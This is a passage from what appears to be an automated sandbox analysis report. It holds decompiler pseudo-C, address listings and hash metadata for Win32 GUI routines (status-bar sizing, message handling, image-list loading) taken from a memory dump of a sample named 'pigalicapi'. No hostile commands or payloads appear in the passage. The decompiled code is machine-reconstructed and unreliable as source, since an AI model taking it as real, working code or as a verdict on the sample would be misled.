                                                                                                                                                                                                                                                                                          							_v44 = 0;
                                                                                                                                                                                                                                                                                          							_v60 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t101 + 4), 0x417, _v64,  &_v60);
                                                                                                                                                                                                                                                                                          							_t65 = _v52;
                                                                                                                                                                                                                                                                                          							if((_t65 & 0x00000004) == 0 || (_t65 & 0x00000008) != 0 || _v16 > _v40.right) {
                                                                                                                                                                                                                                                                                          								MessageBeep(0);
                                                                                                                                                                                                                                                                                          								 *_v68 = 1;
                                                                                                                                                                                                                                                                                          								goto L12;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								PostMessageA( *(_t101 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          								if(_a4 == 0xd) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t101 + 4), 0x448, _v64, 0);
                                                                                                                                                                                                                                                                                          									_pop(_t99);
                                                                                                                                                                                                                                                                                          									return E008159E6(0, 0, _v8 ^ _t102, _v64, _t99, _t101);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t91 = _t56;
                                                                                                                                                                                                                                                                                          							if(SendMessageA(_v72, 0x44e, _t56,  &_v64) != 0) {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_a4 == 0x2f) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									MessageBeep(0);
                                                                                                                                                                                                                                                                                          									_pop(_t100);
                                                                                                                                                                                                                                                                                          									return E008159E6(0, 0, _v8 ^ _t102, _t91, _t100, __esi);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                                          0x0080e0a0
                                                                                                                                                                                                                                                                                          0x0080e0a6
                                                                                                                                                                                                                                                                                          0x0080e0ad
                                                                                                                                                                                                                                                                                          0x0080e0b0
                                                                                                                                                                                                                                                                                          0x0080e0b6
                                                                                                                                                                                                                                                                                          0x0080e0b9
                                                                                                                                                                                                                                                                                          0x0080e0c8
                                                                                                                                                                                                                                                                                          0x0080e1ef
                                                                                                                                                                                                                                                                                          0x0080e1f2
                                                                                                                                                                                                                                                                                          0x0080e200
                                                                                                                                                                                                                                                                                          0x0080e0ce
                                                                                                                                                                                                                                                                                          0x0080e0ce
                                                                                                                                                                                                                                                                                          0x0080e0d1
                                                                                                                                                                                                                                                                                          0x0080e0dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e0e2
                                                                                                                                                                                                                                                                                          0x0080e0e2
                                                                                                                                                                                                                                                                                          0x0080e0eb
                                                                                                                                                                                                                                                                                          0x0080e0f1
                                                                                                                                                                                                                                                                                          0x0080e12f
                                                                                                                                                                                                                                                                                          0x0080e139
                                                                                                                                                                                                                                                                                          0x0080e13c
                                                                                                                                                                                                                                                                                          0x0080e13f
                                                                                                                                                                                                                                                                                          0x0080e142
                                                                                                                                                                                                                                                                                          0x0080e145
                                                                                                                                                                                                                                                                                          0x0080e153
                                                                                                                                                                                                                                                                                          0x0080e156
                                                                                                                                                                                                                                                                                          0x0080e159
                                                                                                                                                                                                                                                                                          0x0080e167
                                                                                                                                                                                                                                                                                          0x0080e16a
                                                                                                                                                                                                                                                                                          0x0080e16f
                                                                                                                                                                                                                                                                                          0x0080e174
                                                                                                                                                                                                                                                                                          0x0080e177
                                                                                                                                                                                                                                                                                          0x0080e17a
                                                                                                                                                                                                                                                                                          0x0080e17d
                                                                                                                                                                                                                                                                                          0x0080e18b
                                                                                                                                                                                                                                                                                          0x0080e18e
                                                                                                                                                                                                                                                                                          0x0080e190
                                                                                                                                                                                                                                                                                          0x0080e195
                                                                                                                                                                                                                                                                                          0x0080e1e0
                                                                                                                                                                                                                                                                                          0x0080e1e9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e1a3
                                                                                                                                                                                                                                                                                          0x0080e1af
                                                                                                                                                                                                                                                                                          0x0080e1b9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e1bb
                                                                                                                                                                                                                                                                                          0x0080e1c9
                                                                                                                                                                                                                                                                                          0x0080e1cd
                                                                                                                                                                                                                                                                                          0x0080e1dc
                                                                                                                                                                                                                                                                                          0x0080e1dc
                                                                                                                                                                                                                                                                                          0x0080e1b9
                                                                                                                                                                                                                                                                                          0x0080e0f3
                                                                                                                                                                                                                                                                                          0x0080e0f3
                                                                                                                                                                                                                                                                                          0x0080e108
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e10a
                                                                                                                                                                                                                                                                                          0x0080e10e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e114
                                                                                                                                                                                                                                                                                          0x0080e115
                                                                                                                                                                                                                                                                                          0x0080e11d
                                                                                                                                                                                                                                                                                          0x0080e12c
                                                                                                                                                                                                                                                                                          0x0080e12c
                                                                                                                                                                                                                                                                                          0x0080e10e
                                                                                                                                                                                                                                                                                          0x0080e108
                                                                                                                                                                                                                                                                                          0x0080e0f1
                                                                                                                                                                                                                                                                                          0x0080e0dc

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 0080E0C0
                                                                                                                                                                                                                                                                                          • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0080C459,00000020), ref: 0080E0D4
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080E104
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 0080E115
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 0080E145
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080E16A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080E18E
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 0080E1AF
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080E1C9
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 0080E1E0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$Send$Beep$ClientEnabledFocusPostRectWindow
                                                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                                                          • API String ID: 787769824-2043925204
                                                                                                                                                                                                                                                                                          • Opcode ID: a673063c03699b9e0ebcb0201b5a99987b5c2677cafc55ca9514d520e36e84ba
                                                                                                                                                                                                                                                                                          • Instruction ID: e5109c1265866e58e5419299cd9113b4ca32c059b675dfaf6dbb55228b777e92
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a673063c03699b9e0ebcb0201b5a99987b5c2677cafc55ca9514d520e36e84ba
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8041FDB1A00208AFDB54DFA9DD859AEB7F9FF48701F10852EF849E7251E730A901CB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                          			E0080AA10(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				char _v155;
                                                                                                                                                                                                                                                                                          				char _v156;
                                                                                                                                                                                                                                                                                          				intOrPtr _v160;
                                                                                                                                                                                                                                                                                          				intOrPtr _v164;
                                                                                                                                                                                                                                                                                          				void* _v168;
                                                                                                                                                                                                                                                                                          				void* _v688;
                                                                                                                                                                                                                                                                                          				char _v692;
                                                                                                                                                                                                                                                                                          				intOrPtr _v696;
                                                                                                                                                                                                                                                                                          				void* _v700;
                                                                                                                                                                                                                                                                                          				struct tagSIZE _v708;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v712;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v720;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                                                                                                          				long _t86;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t88;
                                                                                                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                                                                                                          				int _t98;
                                                                                                                                                                                                                                                                                          				int _t101;
                                                                                                                                                                                                                                                                                          				intOrPtr _t104;
                                                                                                                                                                                                                                                                                          				long _t105;
                                                                                                                                                                                                                                                                                          				void* _t112;
                                                                                                                                                                                                                                                                                          				void* _t113;
                                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                                                                                                          				void* _t147;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t148;
                                                                                                                                                                                                                                                                                          				signed int _t149;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t150;
                                                                                                                                                                                                                                                                                          				intOrPtr _t152;
                                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                                                                          				long _t155;
                                                                                                                                                                                                                                                                                          				signed int _t156;
                                                                                                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t161 = __eflags;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081F31B);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t77 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_t78 = _t77 ^ _t156;
                                                                                                                                                                                                                                                                                          				_v24 = _t78;
                                                                                                                                                                                                                                                                                          				_push(_t146);
                                                                                                                                                                                                                                                                                          				_push(_t78);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t157 - 0x2c4;
                                                                                                                                                                                                                                                                                          				_t112 = __ecx;
                                                                                                                                                                                                                                                                                          				_t152 = __edx;
                                                                                                                                                                                                                                                                                          				_push( *((intOrPtr*)(__ecx + 0x28)));
                                                                                                                                                                                                                                                                                          				_v700 = __ecx;
                                                                                                                                                                                                                                                                                          				_v696 = __edx;
                                                                                                                                                                                                                                                                                          				 *(__ecx + 0x24) = 3;
                                                                                                                                                                                                                                                                                          				E008162C2();
                                                                                                                                                                                                                                                                                          				 *(_t112 + 0x28) = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t135 = 0xc >> 0x20;
                                                                                                                                                                                                                                                                                          				_push( ~(0 | _t161 > 0x00000000) | 0xc);
                                                                                                                                                                                                                                                                                          				 *(_t112 + 0x28) = E00815DD7(0xc >> 0x20, _t146, __edx, _t161);
                                                                                                                                                                                                                                                                                          				_t86 =  *(_t112 + 0x28);
                                                                                                                                                                                                                                                                                          				if(_t86 != 0) {
                                                                                                                                                                                                                                                                                          					_v692 =  &_v688;
                                                                                                                                                                                                                                                                                          					 *_t86 =  *((intOrPtr*)(__edx));
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t86 + 4)) =  *((intOrPtr*)(__edx + 4));
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t86 + 8)) =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                                                                                          					_t88 =  *(_t112 + 4);
                                                                                                                                                                                                                                                                                          					_v712 = _t88;
                                                                                                                                                                                                                                                                                          					_t148 = GetDC(_t88);
                                                                                                                                                                                                                                                                                          					_v720 = _t148;
                                                                                                                                                                                                                                                                                          					_t92 = SelectObject(_t148, SendMessageA( *(_t112 + 4), 0x31, 0, 0));
                                                                                                                                                                                                                                                                                          					_t149 = 0;
                                                                                                                                                                                                                                                                                          					_v700 = _t92;
                                                                                                                                                                                                                                                                                          					_v168 = 0;
                                                                                                                                                                                                                                                                                          					_v164 = 0;
                                                                                                                                                                                                                                                                                          					_v160 = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t112 + 4), 0x407, 0,  &_v168);
                                                                                                                                                                                                                                                                                          					_v156 = 0;
                                                                                                                                                                                                                                                                                          					E00816820( &_v155, 0, 0x7f);
                                                                                                                                                                                                                                                                                          					_v708.cx = 0;
                                                                                                                                                                                                                                                                                          					_v708.cy = 0;
                                                                                                                                                                                                                                                                                          					_v696 = _v168;
                                                                                                                                                                                                                                                                                          					_t154 = _t152 -  &_v688;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_t98 =  *(_t156 + _t154 + _t149 * 4 - 0x2ac);
                                                                                                                                                                                                                                                                                          						if(_t98 != 0) {
                                                                                                                                                                                                                                                                                          							LoadStringA( *0x880c0c, _t98,  &_v156, 0x80);
                                                                                                                                                                                                                                                                                          							_t101 = lstrlenA( &_v156);
                                                                                                                                                                                                                                                                                          							__eflags = _t101 - 0xffffffff;
                                                                                                                                                                                                                                                                                          							if(_t101 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          								_t101 = lstrlenA( &_v156);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							GetTextExtentPoint32A(_v720,  &_v156, _t101,  &_v708);
                                                                                                                                                                                                                                                                                          							_t143 = _v160 + _v696;
                                                                                                                                                                                                                                                                                          							__eflags = _t143;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t156 + _t149 * 4 - 0x2ac)) = _t143 + _v708.cx + 6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t156 + _t149 * 4 - 0x2ac)) = 0x3fffffff;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t104 =  *((intOrPtr*)(_t156 + _t149 * 4 - 0x2ac));
                                                                                                                                                                                                                                                                                          						_t149 = _t149 + 1;
                                                                                                                                                                                                                                                                                          						_v696 = _t104;
                                                                                                                                                                                                                                                                                          					} while (_t149 < 3);
                                                                                                                                                                                                                                                                                          					_t105 = SendMessageA( *(_t112 + 4), 0x404, 3,  &_v688);
                                                                                                                                                                                                                                                                                          					_t150 = _v720;
                                                                                                                                                                                                                                                                                          					_t155 = _t105;
                                                                                                                                                                                                                                                                                          					SelectObject(_t150, _v700);
                                                                                                                                                                                                                                                                                          					ReleaseDC(_v712, _t150);
                                                                                                                                                                                                                                                                                          					_t135 =  &_v688;
                                                                                                                                                                                                                                                                                          					if(_v692 !=  &_v688) {
                                                                                                                                                                                                                                                                                          						E0080D040( &_v692);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t86 = _t155;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t147);
                                                                                                                                                                                                                                                                                          				_pop(_t153);
                                                                                                                                                                                                                                                                                          				_pop(_t113);
                                                                                                                                                                                                                                                                                          				return E008159E6(_t86, _t113, _v24 ^ _t156, _t135, _t147, _t153);
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x0080aa10
                                                                                                                                                                                                                                                                                          0x0080aa13
                                                                                                                                                                                                                                                                                          0x0080aa15
                                                                                                                                                                                                                                                                                          0x0080aa20
                                                                                                                                                                                                                                                                                          0x0080aa27
                                                                                                                                                                                                                                                                                          0x0080aa2c
                                                                                                                                                                                                                                                                                          0x0080aa2e
                                                                                                                                                                                                                                                                                          0x0080aa33
                                                                                                                                                                                                                                                                                          0x0080aa34
                                                                                                                                                                                                                                                                                          0x0080aa38
                                                                                                                                                                                                                                                                                          0x0080aa3e
                                                                                                                                                                                                                                                                                          0x0080aa41
                                                                                                                                                                                                                                                                                          0x0080aa46
                                                                                                                                                                                                                                                                                          0x0080aa48
                                                                                                                                                                                                                                                                                          0x0080aa49
                                                                                                                                                                                                                                                                                          0x0080aa4f
                                                                                                                                                                                                                                                                                          0x0080aa55
                                                                                                                                                                                                                                                                                          0x0080aa5c
                                                                                                                                                                                                                                                                                          0x0080aa63
                                                                                                                                                                                                                                                                                          0x0080aa66
                                                                                                                                                                                                                                                                                          0x0080aa75
                                                                                                                                                                                                                                                                                          0x0080aa7e
                                                                                                                                                                                                                                                                                          0x0080aa87
                                                                                                                                                                                                                                                                                          0x0080aa9e
                                                                                                                                                                                                                                                                                          0x0080aaa3
                                                                                                                                                                                                                                                                                          0x0080aab1
                                                                                                                                                                                                                                                                                          0x0080aab7
                                                                                                                                                                                                                                                                                          0x0080aabc
                                                                                                                                                                                                                                                                                          0x0080aac2
                                                                                                                                                                                                                                                                                          0x0080aac5
                                                                                                                                                                                                                                                                                          0x0080aac9
                                                                                                                                                                                                                                                                                          0x0080aad9
                                                                                                                                                                                                                                                                                          0x0080aae1
                                                                                                                                                                                                                                                                                          0x0080aaef
                                                                                                                                                                                                                                                                                          0x0080aaff
                                                                                                                                                                                                                                                                                          0x0080ab02
                                                                                                                                                                                                                                                                                          0x0080ab10
                                                                                                                                                                                                                                                                                          0x0080ab16
                                                                                                                                                                                                                                                                                          0x0080ab1c
                                                                                                                                                                                                                                                                                          0x0080ab22
                                                                                                                                                                                                                                                                                          0x0080ab32
                                                                                                                                                                                                                                                                                          0x0080ab39
                                                                                                                                                                                                                                                                                          0x0080ab4d
                                                                                                                                                                                                                                                                                          0x0080ab53
                                                                                                                                                                                                                                                                                          0x0080ab59
                                                                                                                                                                                                                                                                                          0x0080ab5f
                                                                                                                                                                                                                                                                                          0x0080ab61
                                                                                                                                                                                                                                                                                          0x0080ab64
                                                                                                                                                                                                                                                                                          0x0080ab6d
                                                                                                                                                                                                                                                                                          0x0080ab90
                                                                                                                                                                                                                                                                                          0x0080ab9d
                                                                                                                                                                                                                                                                                          0x0080aba3
                                                                                                                                                                                                                                                                                          0x0080aba6
                                                                                                                                                                                                                                                                                          0x0080abaf
                                                                                                                                                                                                                                                                                          0x0080abaf
                                                                                                                                                                                                                                                                                          0x0080abcb
                                                                                                                                                                                                                                                                                          0x0080abd7
                                                                                                                                                                                                                                                                                          0x0080abd7
                                                                                                                                                                                                                                                                                          0x0080abe7
                                                                                                                                                                                                                                                                                          0x0080ab6f
                                                                                                                                                                                                                                                                                          0x0080ab6f
                                                                                                                                                                                                                                                                                          0x0080ab6f
                                                                                                                                                                                                                                                                                          0x0080abee
                                                                                                                                                                                                                                                                                          0x0080abf5
                                                                                                                                                                                                                                                                                          0x0080abf6
                                                                                                                                                                                                                                                                                          0x0080abfc
                                                                                                                                                                                                                                                                                          0x0080ac17
                                                                                                                                                                                                                                                                                          0x0080ac1d
                                                                                                                                                                                                                                                                                          0x0080ac23
                                                                                                                                                                                                                                                                                          0x0080ac2d
                                                                                                                                                                                                                                                                                          0x0080ac3b
                                                                                                                                                                                                                                                                                          0x0080ac41
                                                                                                                                                                                                                                                                                          0x0080ac4d
                                                                                                                                                                                                                                                                                          0x0080ac55
                                                                                                                                                                                                                                                                                          0x0080ac55
                                                                                                                                                                                                                                                                                          0x0080ac5a
                                                                                                                                                                                                                                                                                          0x0080ac5a
                                                                                                                                                                                                                                                                                          0x0080ac5f
                                                                                                                                                                                                                                                                                          0x0080ac67
                                                                                                                                                                                                                                                                                          0x0080ac68
                                                                                                                                                                                                                                                                                          0x0080ac69
                                                                                                                                                                                                                                                                                          0x0080ac77

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ObjectSelectlstrlen$ExtentLoadPoint32ReleaseStringText_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1950834119-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b8d3e40bc91a743e0abbf9f5fa5bb6ab1ee15534c7f7b99079c388120e3d6967
                                                                                                                                                                                                                                                                                          • Instruction ID: 95d65475537a17f7de0897d2015896b47669ea817ea7dbbb74c3af5b2e016402
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8d3e40bc91a743e0abbf9f5fa5bb6ab1ee15534c7f7b99079c388120e3d6967
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E611BB1A052199FDB64CF68DC88B9AB7B9FF88310F108199E50DD7291DB309A81CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                          			E0080DA60(void* __edi, CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				short* _v28;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t46;
                                                                                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                                                                          				int _t57;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				short* _t76;
                                                                                                                                                                                                                                                                                          				signed int _t89;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t98;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				signed int _t108;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t96 = __edi;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081F678);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t42 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_push(_t42 ^ _t108);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t98 =  *0x880c0c;
                                                                                                                                                                                                                                                                                          				_t46 = FindResourceA(_t98, _a4, 0xf1);
                                                                                                                                                                                                                                                                                          				if(_t46 == 0) {
                                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t48 = LoadResource(_t98, _t46);
                                                                                                                                                                                                                                                                                          					if(_t48 == 0) {
                                                                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t73 = LockResource(_t48);
                                                                                                                                                                                                                                                                                          						if(_t73 == 0) {
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t89 =  *(_t73 + 6) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_t5 = _t73 + 8; // 0x8
                                                                                                                                                                                                                                                                                          							_v28 = _t5;
                                                                                                                                                                                                                                                                                          							_v24 = _t89;
                                                                                                                                                                                                                                                                                          							E0080DA00( *(_t73 + 4) & 0x0000ffff,  *(_t73 + 2) & 0x0000ffff, __edi);
                                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)(__edi + 0x48)) != 0) {
                                                                                                                                                                                                                                                                                          								L5:
                                                                                                                                                                                                                                                                                          								_v8 = 0;
                                                                                                                                                                                                                                                                                          								if(( *(_t96 + 0x85) & 0x00000020) == 0) {
                                                                                                                                                                                                                                                                                          									_t53 = LoadBitmapA( *0x880c0c, _a4);
                                                                                                                                                                                                                                                                                          									_v20 = _t53;
                                                                                                                                                                                                                                                                                          									_t101 = _t53;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t101 = LoadImageA( *0x880c0c, _a4, 0, 0, 0, 0x2040);
                                                                                                                                                                                                                                                                                          									_v20 = _t101;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_t101 == 0) {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(ImageList_AddMasked( *(_t96 + 0x48), _t101,  *(_t96 + 0xa0)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                          										_t55 = _v24;
                                                                                                                                                                                                                                                                                          										if(_t55 > 0) {
                                                                                                                                                                                                                                                                                          											_t76 = _v28;
                                                                                                                                                                                                                                                                                          											_v24 = _t55;
                                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                                          												if( *_t76 != 0) {
                                                                                                                                                                                                                                                                                          													E0080A220(_t76, _t96 + 0x4c);
                                                                                                                                                                                                                                                                                          													_t101 = _v20;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_t76 = _t76 + 2;
                                                                                                                                                                                                                                                                                          												_t35 =  &_v24;
                                                                                                                                                                                                                                                                                          												 *_t35 = _v24 - 1;
                                                                                                                                                                                                                                                                                          											} while ( *_t35 != 0);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t57 = ImageList_GetImageCount( *(_t96 + 0x48));
                                                                                                                                                                                                                                                                                          										_push(_t101);
                                                                                                                                                                                                                                                                                          										if(_t57 ==  *((intOrPtr*)(_t96 + 0x50))) {
                                                                                                                                                                                                                                                                                          											DeleteObject();
                                                                                                                                                                                                                                                                                          											 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          											return 1;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											DeleteObject();
                                                                                                                                                                                                                                                                                          											 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          											return 0;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
